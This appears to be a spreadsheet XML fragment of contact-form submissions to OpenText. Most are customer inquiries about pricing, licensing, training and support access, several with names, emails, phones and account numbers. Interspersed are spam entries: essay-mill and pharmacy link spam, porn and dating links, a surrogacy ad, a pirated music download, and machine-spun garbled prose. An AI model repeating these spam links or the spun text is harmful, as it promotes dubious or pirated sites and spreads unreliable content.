I am the user migrated from EMC portals. I am not having access to Documentum links, forums, product documentations etc. Everytime OpenText sites says that "Almost there, our record shows that you have not confirmed the email address. Please confirm the email address and get the access". I have confirmed the email address twice but still I am not able to get access to knowledge base or any Docuementum related information._x000D_
Please suggest what should be done_x000D_
Thanks_x000D_
SM</t>
  </si>
  <si>
    <t xml:space="preserve">I'm amazed. I don't think I know anybody who understands as much about the topic. You should make a career of it, really, awesome site _x000D_
http://starimages.org/best-custom-essays-writing-service-amongst-other-7/_x000D_
</t>
  </si>
  <si>
    <t>wanting to get prices on exceed</t>
  </si>
  <si>
    <t xml:space="preserve">Our company is using opentext catalogue and registered as PHYNE by PAIGE NOVICK. Is there a way we can change the name to PAIGE NOVICK?_x000D_
(acct# 122122521441) </t>
  </si>
  <si>
    <t>What can you tell me about OpenText NFS Client and "Access Amazon EFS volumes from Windows instances"?  Users' success stories?  Performance?  Thanks.</t>
  </si>
  <si>
    <t>Understand pricing/scope of CCE16.</t>
  </si>
  <si>
    <t>Can you please send me a link to yesterdays Webex Seminar: What's New in OpenText Content Suite and Core.</t>
  </si>
  <si>
    <t>we are moving to Windows 10 systems and have a slight issue with RightFax using v10.6.  Is version 10.6 compatible with Windows 10.  What is the latest version 2016 and i'm wondering if the new version would get us past the issue?_x000D_
_x000D_
Thanks in advance for your assistance today_x000D_
Ed</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you for sharing with us, I always discover something new from your posts. _x000D_
http://www.phatdaddyssmokeshop.com/2017/02/08/try-to-buy-essays-online-and-also-you-will-not-3/_x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I would like to become WEM certified. I am interested in taking your pre-requisite courses including 1-3421 Managing Content with OpenText Web Experience Management v16; however there don't seem to be any dates available. How can I go about getting certified? _x000D_
_x000D_
Thank you, _x000D_
_x000D_
-Vicki</t>
  </si>
  <si>
    <t xml:space="preserve">I like to get my inspiration from really meaningful phrases said by truly great people like вЂњThe unexamined life is not worth livingвЂќ, do you know where I can find thematic compiltaions of those?_x000D_
 _x000D_
http://www.yourcreditrights.com/the-benefits-of-on-the-web-essay-writing-services-44/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Request for co-term quote for one of our customers CAK with entitlement ID 18040879 regarding Captiva products.  </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, as part of a global HR project we need a cloud managed solution to receive Fax documents and forward them to eMail and to forward eMails to an external Fax machine. Do to some data privacy requirements the hosting for this solution would have to be within the European Union. Please let me know if you support such a solution. </t>
  </si>
  <si>
    <t xml:space="preserve">I like to get my inspiration from really meaningful phrases said by truly great people like вЂњReligion is the sign of the oppressed ... it is the opium of the peopleвЂќ, do you know where I can find thematic compiltaions of those?_x000D_
 _x000D_
http://www.gdgmumbai.org/write-me-my-essay/where-to-find-professional-essay-writers-9/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Búsqueda de distribuidores en Chile para licenciamiento de "Gupta 7.0 Team Developers"._x000D_
_x000D_
Muchas gracias_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I require a quotation for a service currently provided to my customer (Vodafone), previously purchased by a different reseller. _x000D_
_x000D_
Please provide the email details of the sales/contract renewals team so that I can share the information of this renewal and request a quote. _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Steph </t>
  </si>
  <si>
    <t>I would like to test Captiva Cloud toolkit</t>
  </si>
  <si>
    <t>Cannot enter a password to initialize the account creation</t>
  </si>
  <si>
    <t>How can we delete aplicaction documents in ixos that expired retention period ?</t>
  </si>
  <si>
    <t>Our account no. 665 000000694_x000D_
We are currently using your secured fax messaging services, however we would like to make a change request for redirecting all fax messages to any local number instead of the existing number.  Thanking in advance, looking forward to your kind response.</t>
  </si>
  <si>
    <t>We have received a payment of $ 39,676.18 from “OPENTEXT” on 23rd Jan’18.Could you please provide us remittance advise so that we can apply the payment ?  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We have received a payment of $10,878.78 from “OPENTEXT” on 22nd Jan’18.Could you please provide us the remittance advise so that we can apply the payment ? </t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a solution in SDAA in regards to Archiving documents, life cycle of documents, retention of docs..etc. EIM solution that is tailored to specific needs of SDAA. </t>
  </si>
  <si>
    <t>Hi,_x000D_
Is Firstclass 16.103 avaiable on ubuntu/debian ? _x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>I have demo version Quick Scan and would like to have a serial number/product key for Pro or full version of software?_x000D_
_x000D_
Please could you provided me information about serial numbers for the Quick Scan software.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir planen unser ERP System im kommenden Oktober auf S/4HANA umzusetzen. Bisher haben wir erfolgreich eine Kopie unseres produktiven ERP auf 1609 umgesetzt. Derzeit haben wir Ihr Add-on VIM 7.5 SPS 5 im Einsatz. Die Umsetzung des VIM ist in der Sandbox allerdings bisher noch nicht erfolgt, soll aber zeitnah erfolgen. Nach dem SAP-Hinweis 2339256 empfiehlt OpenText VIM 16.3. Da dies auch Voraussetzung von S/4HANA 1709 ist, ergeben sich hier einige Fragen für die BImA._x000D_
Können Sie mich bitte an einen im VIM-Upgrade kompetenten Ansprechpartner weiterleiten?_x000D_
_x000D_
Im Voraus vielen Dank_x000D_
_x000D_
Jürgen E. Stanglow</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
I hope this e-mail finds you well._x000D_
_x000D_
This morning I was looking at your company website and came across your details. I thought it best to e-mail as I know how busy working in your profession can be. I was curious if you or any of your colleagues ever found themselves having language service requirements?_x000D_
_x000D_
TranslateMedia is a leading global translation agency with offices in London, New York, Hong Kong and China. Our professional language services have been independently audited and awarded the ISO 9001 and IS017100 accreditations, reflecting the quality standards that the company maintains throughout its activities. _x000D_
We help brands and corporations expand internationally by providing translation, transcreation, copywriting, website and app localisation &amp; CMS integration, SEO and PPC service via our offices in Hong Kong, Europe and the US. We have a very capable team in place to handle all your requirements. We have more than 6,500 professional translators in various time zones around the world, together with our global presence this allows us to provide round the clock coverage. _x000D_
_x000D_
If language services is something that maybe of interest to you please let me know and I would be happy to have a chat about what we offer or provide a comparison quote. Alternatively if you’re sure this is something that is of no interest please let me know and I will make sure my records are up-to-date._x000D_
</t>
  </si>
  <si>
    <t>Dear OpenText team,_x000D_
_x000D_
IBRS is updating and expanding its previous market study on enterprise content management solutions.  I wish to arrange a vendor briefing with an appropriate person from your company to update Dr Joseph Sweeney, the lead advisor on this study about your solutions. _x000D_
_x000D_
The briefing will be relatively open, giving you a chance to outline your solutions and services. _x000D_
_x000D_
Based on previous telephone briefings, we expect we will need about 45 min to discuss the issues. The easiest way to find a date and time for the briefing is via this link: https://bookme.name/joesweeney/briefing-on-enterprise-content-management-solutions_x000D_
_x000D_
We wish to complete all vendor briefings by 4th March 2018.  _x000D_
_x000D_
If you have any other questions, please just email me and I will get back to you as quickly as possible._x000D_
Best regards,_x000D_
Jaie Obillo</t>
  </si>
  <si>
    <t>Please advise email address to send a qualification check - EnCE - EnCase Certification in UK at Guidance Software now Opentext</t>
  </si>
  <si>
    <t xml:space="preserve">I am fascinated. I don't think I know anybody who knows so much about the topic. You should make a career of it, really, great blog _x000D_
http://www.micth.com/capture-professional-essays-with-our-service-45/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.bharathospitalityware.com/css/template.asp?ProductID=554-Viagra-Generico-Prezzo-Cialis-Generico-Italia-Con-Paypal-Cialis-Senza-Prescrizione-Medica]Viagra Generico Prezzo[/url]_x000D_
 When very first creating a business website, it is essential to think about many inquiries. Who seems to be your target audience, by way of example? What clients are you attempting to attract? What how would you like your website to achieve - better revenue or simply increased brand recognition? Addressing questions such as these will most efficiently let you establish a effective on-line reputation._x000D_
  [url=http://www.bharathospitalityware.com/css/template.asp?ProductID=223-Kamagra-Gel-Cialis-Originale-10-Mg-Viagra-Vendita-Farmacia]Kamagra Gel[/url]_x000D_
 Grow to be your own personal enterprise professional. Write content related to your organization, and put a link within the byline or article writer box aimed at your website. Incorporate your e-mail address when possible. Look for chances to mention your expertise by way of on the internet or maybe in-person workshops. Supply to communicate for companies in whose people can usually benefit from your products, and provide the group a reveal of yhour income earnings._x000D_
  [url=http://www.agl-agemar.com/mail/box.asp?id=309]Kamagra Soft Pas Cher[/url]_x000D_
 Recall that it must be completely satisfactory to be lower than best. Flawlessness foliage no space for learning or enhancement, yet they are two of the items can make existence so interesting and pleasurable. Assess your defects to determine what their most likely effects are stored on your life. Most likely, you will find that even your flaws design who you are and how you reside._x000D_
  [url=http://www.donatim.net/diller/file.asp?dil=262-Kamagra-Gel-Duree-Levitra-20mg-Prix-Prix-Viagra-Generique-En-Pharmacie]Kamagra Gel Duree[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Not too long ago I've come across one article which I believe you could find useful. Someone may take a steaming dump all over it, however it answered some of my questions. _x000D_
http://www.terraagricola.com.br/the-differing-types-of-essays-that-online-essay-9/_x000D_
</t>
  </si>
  <si>
    <t>◇◆◇◆◇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
         ☆もう求人で困らない！！パート派遣５つのメリット☆_x000D_
──────────────────────────────────────────────_x000D_
１．ニーズに合わせて、多種多様な経験を持った人材から選べます_x000D_
２．必要な曜日・時間だけ人材の確保ができます_x000D_
３．複数人での業務シェアで、欠員時のリスクヘッジができます_x000D_
４．業務の切り分けのノウハウも提供します。ご相談ください_x000D_
５．パート派遣専門サイト「派遣deパート」による人材確保_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━◇◆◇◆◇_x000D_
_x000D_
突然のメール失礼致します。_x000D_
このたびは貴社のホームページを拝見してご連絡させて頂きました。_x000D_
株式会社キャリアシステムと申します。_x000D_
_x000D_
弊社は、東京・名古屋・大阪で、パートタイム型／ワークシェア型派遣に特化した人材派遣会社です。_x000D_
_x000D_
本日は、今すぐ働ける人材として、下記に「HOT人材情報」を提案いたします。_x000D_
興味ある人材でしたら、是非一度ご連絡下さい。_x000D_
_x000D_
今回のHOT人材 ＜1＞-----------------------------------------------_x000D_
【イニシャル】HHさん（ID：16240）_x000D_
【年代・性別】40代女性_x000D_
【住所】埼玉県さいたま市_x000D_
【職種】プログラム・テスト_x000D_
【経歴値】顧客管理システムのプログラムやテスト、導入支援まで経験。_x000D_
またパッケージ導入SEとしてデモンストレーションや_x000D_
マニュアル作成などにも携わった経験あり。_x000D_
【ポイント】VBA、VB.netの開発環境を得意とする_x000D_
【就業形態】週4日　10：00～16：00　1日5時間_x000D_
----------------------------------------------------------------------------------------_x000D_
今回のHOT人材＜2＞-----------------------------------------------_x000D_
【イニシャル】MSさん（ID：19081）_x000D_
【年代・性別】30代女性_x000D_
【住所】東京都調布市_x000D_
【職種】広報PR担当_x000D_
【経歴値】旅行サイト運営会社にて、広報活動全般に関わる企画・運用を担当。_x000D_
主には、運営サービスおよび自社に関するプレスリリースの作成、_x000D_
メディア向けPR、会社サイト運営（コンテンツ企画・取材・作成を含む）、_x000D_
会社パンフレット運用、採用広報、FBアカウント運用、_x000D_
インナーブランディングの企画及び実施などに従事する。_x000D_
【ポイント】これまでの経験を活かし、広報PRの分野に関わっていきたい意欲的な女性。_x000D_
【就業形態】週3日　9：00～18：00　1日8時間_x000D_
----------------------------------------------------------------------------------------_x000D_
上記以外にも毎日パート人材が登録にお越しいただいてます。_x000D_
経験職種や取得されている資格などは多岐にわたります。_x000D_
_x000D_
その中でも、弊社が特化し強みとしているのが下記の職種となります。_x000D_
◆Web人材（デザイナー、ディレクター、コーダー、HP更新、DTP等）_x000D_
◆ITエンジニア（SE・PG、テスト工程、アシスタント等）_x000D_
◆事務系職種（営業事務、経理事務、総務事務、受付事務、医療事務等）_x000D_
◆サポート系職種（カスタマサービス、テレマ、CAD事務、営業アシスタント等）_x000D_
_x000D_
実際にパートタイム派遣をご活用頂いている_x000D_
企業様をご紹介しております。是非、こちらもご覧下さい！_x000D_
https://www.parthaken.jp/employer/_x000D_
_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
株式会社キャリアシステム 　東京支店_x000D_
担当：横山、佐藤_x000D_
cs-contact@919.jp_x000D_
_x000D_
〒107-0052 東京都港区赤坂2-11-7 ATT新館_x000D_
TEL：03-5574-7333_x000D_
フリーコール：0120-505-169_x000D_
_x000D_
「キャリアシステムHP（法人様向け）」：https://www.parthaken.com/_x000D_
「キャリアシステムHP」：https://www.career-system.net/_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</t>
  </si>
  <si>
    <t>I am trying to obtain the content from _x000D_
https://www.opentext.com/campaigns/edocs-solution/sharepoint - but there is an error on the form that requires me to fill in a non-existent field value. Please can you send me the content that I am requesting (and fix the form...)</t>
  </si>
  <si>
    <t xml:space="preserve">Good post, I enjoyed it very much.I was pretty lucky to find your site. It has so much helpful info! _x000D_
http://pizza-amore.pl/2016/04/19/the-advantages-of-web-based-essay-writing-services-28/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Awesome site, how do you get all this info?I have read a couple of posts on your site and I really enjoy your writing style. Thanks a million, keep up the good work. _x000D_
http://www.drumconner.co.uk/4771/helpful-tips-on-admission-essay-76/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you for sharing with us, I always learn new things from your posts. _x000D_
http://www.krav-maga-plymouth.co.uk/acquire-customized-essays-and-have-out-of-the-5.html_x000D_
</t>
  </si>
  <si>
    <t>Interested in pricing for one license of TD 7 and TD mobile.</t>
  </si>
  <si>
    <t>I can no longer access My Support. Even changing my OT corporate password makes no difference. Even on the OT corporate network when I connect via the OTDS account login page it just keeps on going to the welcome page and when I select the "go to the original URL" it just goes back to the login page. Continually. Clearing browser cache makes no different._x000D_
_x000D_
This is becoming urgent as I can no longer answer customer questions and have deadlines to meet._x000D_
_x000D_
I have also raise an internat ticket with OT IT.</t>
  </si>
  <si>
    <t>I need to discuss renewing our maintenance for Brava! that was purchased at the end of 2011.  We currently have 150 licenses.  At the time we were working with Scott Simon.  Software ID QDS0CA00B5QY.  Thanks.</t>
  </si>
  <si>
    <t>[url=http://gtalogo.com/]Free porn[/url] _x000D_
[url=http://gtalogo.com/orders.html]Free porn[/url] _x000D_
[url=http://gtalogo.com/faq.html]Free porn[/url] _x000D_
[url=http://gtalogo.com/top.html]Free porn[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">This is my first time visiting your blog and I am very interested. Thank you for sharing and keep up ;) _x000D_
https://soporteuniversal.com.mx/2016/10/26/how-online-writing-services-enable-students-190/_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
Please set up a meeting for ECM Product demo for us._x000D_
_x000D_
We will be looking to present this to a customer._x000D_
_x000D_
Regards_x000D_
_x000D_
Harry</t>
  </si>
  <si>
    <t>Looking for general pricing to determine solution feasibility. _x000D_
- Need to upload, scan, and index documents_x000D_
- Would like the ability to integrate with our applications to add and pull documents_x000D_
- Curious about the Content Management component and its costs/capabilities_x000D_
- Interested in migrating a backlog of existing documents into the system.</t>
  </si>
  <si>
    <t>love him/her</t>
  </si>
  <si>
    <t xml:space="preserve">Many thanks for helping people get the information they need. Good stuff as always. Keep up the great work!!! _x000D_
http://www.telefo.com/essay-writing-personal-crafting-and-online-essay-44/_x000D_
</t>
  </si>
  <si>
    <t>does Liberty Mutual Insurance have a support contract with opentext?</t>
  </si>
  <si>
    <t xml:space="preserve">Many thanks for sharing, I always learn new things from your posts. _x000D_
http://assiparioli.it/admission-application-and-educational-essays-110/_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to set up an account with open text for client macys i have called every combination of number for the sales dept but no one seems to be at that line. which leads me to believe the extension might be incorrect can someone please call us back to set up open text/catalog!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Please call, I need a statement of account dating back to Nov 1, 2017 until Current date 2/13/18. Was $20.75 posted to my credit card on auto pay on 12/29/17. Need itemized statement of account for accounting purposes. </t>
  </si>
  <si>
    <t>We need to find a simple, managed fax solution for our 4 analog lines.</t>
  </si>
  <si>
    <t>Знакомства в Москве. Сайт знакомств в Москве бесплатно, без регистрации, для серьезных отношений. _x000D_
[url=https://loveawake.ru/znakomstva/moskva]Знакомства в Москве. Сайт знакомств в Москве бесплатно, без регистрации, для серьезных отношений.![/url]</t>
  </si>
  <si>
    <t>Whenever the Documentum server went down, the repository is not displayed under DA login url, so for that, we are running manually the "dm_launch_server_config_program.sh" file to run the "repository", after ran the expected repository are displayed under DA login URL, this "dm_launch_server_config_program.sh" file takes an hour to execute, this issue occurred in PROD environment._x000D_
_x000D_
If we have crypto boot Linux command, then it'll not take much time, it'll save our time. so please provide me the crypto boot script/Linux command.</t>
  </si>
  <si>
    <t>I need support for chargeback</t>
  </si>
  <si>
    <t>I am looking to get product information and possibly a quotation for your product/service.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Day,_x000D_
_x000D_
I am looking to get a quote for the following:_x000D_
_x000D_
8x   TD3 Forensic Imager Kit, w/ extended waranty_x000D_
6x   Tableau T35es-R2 - Forensic Write Blocker, w/ extended warranty_x000D_
_x000D_
Thanks,_x000D_
Michael Lane_x000D_
Contractor – LCMM/Procurement of Support Services /Canadian Forces Network Operations Centre_x000D_
Department of National Defence / Government of Canada_x000D_
Ottawa, ON K1A 0K4_x000D_
Michael.Lane2@forces.gc.ca / Telephone | 613-945-6455 x7734 / Facsimile | 613-945-7733_x000D_
</t>
  </si>
  <si>
    <t>Need to discuss solutions for document management for 2 clients.</t>
  </si>
  <si>
    <t>I need an overview or demo of the current edocs offering.  Our legal department is using the product.  Also do you offer professional services to assist with an upgrade or implementation?</t>
  </si>
  <si>
    <t xml:space="preserve">Have a client interested in document management systems, we would like to know more about this and your services. </t>
  </si>
  <si>
    <t>Implementing Opentext VIM Project for TSB - Sabadell bank (UK)_x000D_
_x000D_
Request for the support.</t>
  </si>
  <si>
    <t>https://www.opentext.com/training/coursedetails.html?id=2550_x000D_
I am interested in taking this course in-class at the Ottawa location. I have taken the virtual learning before and did not find the format helpful at all.  When would be your next in-class session in ottawa?  I am with TBS PWGSC EPMO so there is a need to take this course as quickly as possible in order to be able to assist clients.  Please let me know what is possible asap via email. Thank you for your help!</t>
  </si>
  <si>
    <t xml:space="preserve">Looking into OpenText TrustedLink™ Windows (TLW) for Microsoft Windows platforms for EDI integration with one of our largest customers._x000D_
</t>
  </si>
  <si>
    <t>What is the latest build for Brava Desktop?</t>
  </si>
  <si>
    <t>Dear Sales Team,_x000D_
_x000D_
We are a leading software distribution company located in Hungary. We are contacting you on behalf of our customer intending to purchase a Brava! Desktop DX-P-N + Maintenance for 1st Year license for 20 computers. According to our understanding this should be a network license. In case of a network license, would it be possible to install your licenses in networks available in different locations? Our customer would use your products maximum in the number of permitted computers but in different locations. Is this something that can be covered by a network license for 20 computers? Please advise!_x000D_
_x000D_
Thank you and best regards,_x000D_
_x000D_
Edgar Toth_x000D_
Trans-Europe Ltd., Hungary_x000D_
www.software.hu</t>
  </si>
  <si>
    <t>Need to know if we can transmit an 846 through our Perf EDI setup. One of our trading partners is going to require this soon.</t>
  </si>
  <si>
    <t>In the company where I work we have 10 licenses brava desktop that converts files dwf to tiff, I want to know if you can expand those 10 licenses or we have to buy more, and if you have to buy more what would be the price of 20 licenses of brava</t>
  </si>
  <si>
    <t>Inquiring about an inexpensive fax server solution.</t>
  </si>
  <si>
    <t>HI Team,_x000D_
I am looking for my personal (not company sponsor ) training for course "2-8701 Documentum D2 Configuration 4.2 On Demand" . I would like to know how long I will have access to environment after training complete   .  Is their any option where I can get access to environment without  training . In short I am looking for environment where I can do hands on to learn by myself .  Let me know .</t>
  </si>
  <si>
    <t>Interested in RightFax Connect services</t>
  </si>
  <si>
    <t>Request support to debug EOD crashes. Seeking Dialog Semi end user number._x000D_
I would like to log a support request, but our IT team cannot find our end user number. Are you able to look it up and then I will file the request via the normal channel. Best regards, Paul Chapman</t>
  </si>
  <si>
    <t>Our Directory of Quality, Reporting and Program Management is interested in implementing a document management solution.  We are exploring our options and would be interested to learn more about OpenText offerings.</t>
  </si>
  <si>
    <t>Homophobic nationalism_x000D_
_x000D_
my spouse richard Stumbar was first one of many lead legal representatives on the make sure to legalise gay and lesbian union in nyc status in 2008. i have a long tradition by having european feminisms which go as far back to early 1990's rrnside the East/West gumption to hold housewives dialog all-around many of these boundaries._x000D_
_x000D_
the same day all left behind meant for russia, precisely wing Republicans held the usa hostage within their hitting goal on "Obamacare,_x000D_
_x000D_
And for even more wording we want to not your investment whistle blower edward cullen Snowden who searched for asylum and was the winner it again within mother earth pertaining to draconian love natural laws. Whistle blower Chelsea Manning, asap a trans partner, would probably own little bit of prospect of acquiring relevant asylum level, if it turns out the actual could actually ask for it._x000D_
_x000D_
To top up this valuable confused politics mixture of things the majority of Putin's sensible grievance together with US and so leader barack obama to have an conceited common sense of "Exceptionalism, Especially in the case of US terrors that can blast Syria regarding use of substance items. all mankind is looking complexly in a different way parallel wherever._x000D_
_x000D_
beneficial backgrounds, most young women revolutionaries really like Rosa Luxemburg, Clara Zetkin, in addition Alexseem to havera Kollantai neglected been, they were ever been recognized using comment perestroika the ussr. anyone looked at a lot of primary indications from Luxemburg, well known on her 1917 report: "Freedom is usually the freedom concerning dissenters, and found they don't._x000D_
_x000D_
many of us trudged across town in the direction of Finlthen train station to look through neglected depressed figurine for Lenin. the vacationer man or woman contemporary society within a flea industry seemed to don't have any important memory storage. without tshirts because muffin huge range were can be found._x000D_
_x000D_
previous to coming ou</t>
  </si>
  <si>
    <t>Bonjour, dans le cadre d'une mission de conseil pour un de mes clients du secteur pétrolier, je souhaiterai obtenir un contact commercial chez vous. Mon client souhaiterait lancer une consultation dans l'optique de se doter d'un nouvel outil de GED._x000D_
Pourriez-vous s'il vous plait m'indiquer les coordonnées email et téléphoniques d'un représentant._x000D_
Merci._x000D_
Matthieu Lamy</t>
  </si>
  <si>
    <t xml:space="preserve">We interested in the Vendor Invoice Management for our group of companies. </t>
  </si>
  <si>
    <t>To gain insight into Logistics Management</t>
  </si>
  <si>
    <t>Hello Team_x000D_
_x000D_
I am Laksh Debnois with Cpx-traffic leading Adnetwork with presence globally. We have user managed platform and self service paltform traffic for all devices and format . If you are looking to run POP, Banner , email ,Native and Video campaigns then we can help you to set the campaign as we have traffic . _x000D_
You can reach me in Skype or you can reply via email with your requirement ._x000D_
_x000D_
_x000D_
Regards,_x000D_
Laksh Debnois_x000D_
CPX-Traffic_x000D_
_x000D_
_x000D_
Email: laksh@cpx-traffic.com_x000D_
Skype:live:laksh_36  _x000D_
Website:www.cpx-traffic.com</t>
  </si>
  <si>
    <t>Hi,_x000D_
I am studying the implementation of a BI tool within our web application to provide basic reporting to one of our client. This is kind of a lab project to us that we're entirely taking charge of without invoicing the client itself._x000D_
The project would have around 10 users or so to start with, 8 of which with only a read use, data volume in the thousands lines at the most and a few dozens queries a day._x000D_
We need to connect to both a Postgres and a Mongo DB._x000D_
I'd like to know if this can be done with Opentext and have a ballpark of how much it would cost annually._x000D_
Thanks forward,_x000D_
Best,_x000D_
Franck</t>
  </si>
  <si>
    <t>Hi Team, we have an upcoming bench of 40+ resources on Java/UI. these resources are available on short notice across PAN India._x000D_
_x000D_
Regards,_x000D_
Joseph Praveen_x000D_
7893397161_x000D_
joseph.b@ojas-it.com</t>
  </si>
  <si>
    <t>I would like to get an overview and proposal for the OpenText Conten Server</t>
  </si>
  <si>
    <t>We provide enterprise infrastructure services._x000D_
We want a business process automation solution that we can peach to our customers. We found OpenText ECM Suite suitable for this purpose._x000D_
We will be glad if you can schedule a demo with us.</t>
  </si>
  <si>
    <t>Our company is considering the implementation of a third party document management system for some of our Service Lines. We are interested to see the functionalities as well as the associated costs.</t>
  </si>
  <si>
    <t>&lt;img class="aligncenter size-medium" src="http://b.radikal.ru/b09/1801/53/15e125bef649.jpg" width="500" height="500" /&gt;Genre: Future Jazz music Contemporary Jazz,  Experimental music music,   Downtempo  music music, Leftfield,  Techno music music, Electro _x000D_
Country: Brighton, UK _x000D_
Album Release Date: 2010-2018 _x000D_
Album Type: WEB _x000D_
Music Record Label: Tru Thoughts, Denovali Records _x000D_
Codec: MP3 and FLAC tracks _x000D_
Quality: MP3 320kbps CBR and FLAC Lossless _x000D_
Playtime: 8:14:55 _x000D_
 _x000D_
Hidden Orchestra is the solo studio project of multi-instrumentalist composer/producer Joe Acheson. _x000D_
The albums and live shows feature a wide variety of guest musicians from all kinds of musical backgrounds. _x000D_
 _x000D_
-------------------- _x000D_
 _x000D_
[url=https://www.keeplinks.co/p48/5a7ce852a9811 ]Download Hidden Orchestra - Discography 2010-2018[/url] (Tru Thoughts, Denovali Records) MP3 320kbps CBR : _x000D_
 _x000D_
 _x000D_
[url=https://www.keeplinks.co/p48/5a7ce86d87035]Download Hidden Orchestra - Discography[/url] 2010-2018 (Tru Thoughts, Denovali Records) FLAC Lossless : _x000D_
 _x000D_
-------------------- _x000D_
[url=http://trance-music.org/]Download new Electronic Music[/url] _x000D_
 _x000D_
Albums: _x000D_
 _x000D_
2010 Night Walks: _x000D_
2012 Archipelago: _x000D_
2017 Dawn Chorus: _x000D_
2018 Dawn Chorus Remixes _x000D_
 _x000D_
Compilations : _x000D_
 _x000D_
2015 Reorchestrations _x000D_
 _x000D_
Singles &amp; EPs : _x000D_
 _x000D_
2011 Flight EP: _x000D_
2013 Fourth Wall / The Revival: _x000D_
2013 Archipelago Remixes: _x000D_
2014 Archipelago Remixes Part 2: _x000D_
2016 Wingbeats: _x000D_
2017 Still: _x000D_
2017 East London Street: _x000D_
2017 Alyth: _x000D_
2017 Wingbeats (Max Cooper Remix): _x000D_
Joe Acheson (Solo) _x000D_
2016 Marconi &amp; the Lizard</t>
  </si>
  <si>
    <t>Hi OpenText RightFax. Can you please advise the license fee and let us know whether it can be connected to  Avaya Aura System?</t>
  </si>
  <si>
    <t>I require a UK contact email address and phone number to deliver a pre-qualification document for a future tender.</t>
  </si>
  <si>
    <t>Request to grant access to documentum support team to resolve any technical issues._x000D_
below link is not accessible due to permission issue._x000D_
_x000D_
https://communities.opentext.com/forums/discussion/comment/563271</t>
  </si>
  <si>
    <t>Hi, We  "Sapphire IT Solutions" deal with rentals of IT products, kindly asking for an appointment to describe our products and services._x000D_
Thank You.</t>
  </si>
  <si>
    <t>We have a problem with our License Key in Acceptation environment, it doesn't support the generated docx files anymore. Could you assist us please ?_x000D_
Thx in Advance,</t>
  </si>
  <si>
    <t>Surrogacy is very renowned all over the world. The primary argue of it – a wifes become the arrival child’s mommy after birth. Large part of woman want to be a mother, but any of them couldn’t be. _x000D_
 _x000D_
By this reason in last century a new data appeared – surrogate. _x000D_
When pregnancy is medically impracticable, there is only one method to be a mother. It is surrogate. As rule, in these cases use monetary indemnity. _x000D_
 _x000D_
Actually, to search a soundness girl – needed to find medical support which grant this kind of help. _x000D_
We recommend to use this [url=https://www.mother-surrogate.com/the-base-of-surrogate-mothers.php]how much can you make being a surrogate[/url]  clinic. In these agency in Ukraine a lot of people from USA, United Kingdom and different EU regions became surrogate mummy. _x000D_
 _x000D_
Therefore to the law surrogate is juridical. The legality and expenses of surrogacy are very various. It depends from country, creed, color of hair, etc. In our hospitals you can make a option about kind of surrogate. _x000D_
 _x000D_
We advice for all our members to take common surrogacy. But our service contains gestational surrogacy. In Feskov clinics are designation for surrogacy. _x000D_
 _x000D_
When you go on to our organization located in Ukraine - a part of Feskov Human Reproduction Group, you get a consultant. This manager will consult you about various moments from the start till the ending. As rule, surrogacy keep on 9 months. Then the administrator qualify all needed acts and you can adopt the child. _x000D_
 _x000D_
As rule, the administrator receive information your family next months. It you need to get a child, we advise to go there www.mother-surrogate.com. Leaders which are able to help there are very clever. They will response for all your requests. If you needed any attention, they will help you. _x000D_
 _x000D_
Also they will gave acts before this method. _x000D_
On web-site you can find contacts. However you can detect prices and help. Technical support can call you at English. You can make choice of it. _x000D_
 _x000D_
If</t>
  </si>
  <si>
    <t>I need a price for opentext exstream.  We are purchasing a some date from a company that uses hp exstream.  They use if for printing only.  Thanks</t>
  </si>
  <si>
    <t>Hello_x000D_
_x000D_
I have a question about OpenText licensing, specifically about Vignette. I was in conversation with Jack Shea, but looks like he is not more with OpenText._x000D_
_x000D_
Regards_x000D_
_x000D_
Aniruddha Deshpande</t>
  </si>
  <si>
    <t>Can I get a demonstration organized for OPENTEXT ACTIVE CATALOGUE?    We are looking for a tool to allow us to show external customers and sales staff access to our images and customer facing data.</t>
  </si>
  <si>
    <t xml:space="preserve">we are resellers of IT equipment, work with Ingram, Intcomex, techdata and many others. One of our Customers in BERMUDA is requesting a quote for RIGHFAX. Where can we buy that product, to be re-sold in BERMUDA? </t>
  </si>
  <si>
    <t>We are looking for a new VAN provider for our EDI system. Thanks!</t>
  </si>
  <si>
    <t>Quasar Life is a government contractor looking to purchase:_x000D_
_x000D_
75 STANDARD NAMED USERS	Brava Enterprise All-in-One Doc/Image/CAD, All Features	_x000D_
1 Brava Additional Job Processor 	_x000D_
1 PRODUCTION SERVER Brava Enterprise add-on: Additional Brava Server	_x000D_
250 STANDARD NAMED USERS Brava Enterprise Client, All formats, View/Print only (Single User)_x000D_
_x000D_
On behalf of a city government._x000D_
Please send pricing details to engineering@futurenetics.com or call me at 614-636-3002</t>
  </si>
  <si>
    <t>We are interested in using eFax services for our business. Please call with details &amp; pricing info. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Could you please send me a quote for:_x000D_
_x000D_
Qty.3_x000D_
part number: MAINT-SPMPI570700M_x000D_
Electronic Maintenance SECURE SHELL_x000D_
</t>
  </si>
  <si>
    <t>Could you please send me a quote for _x000D_
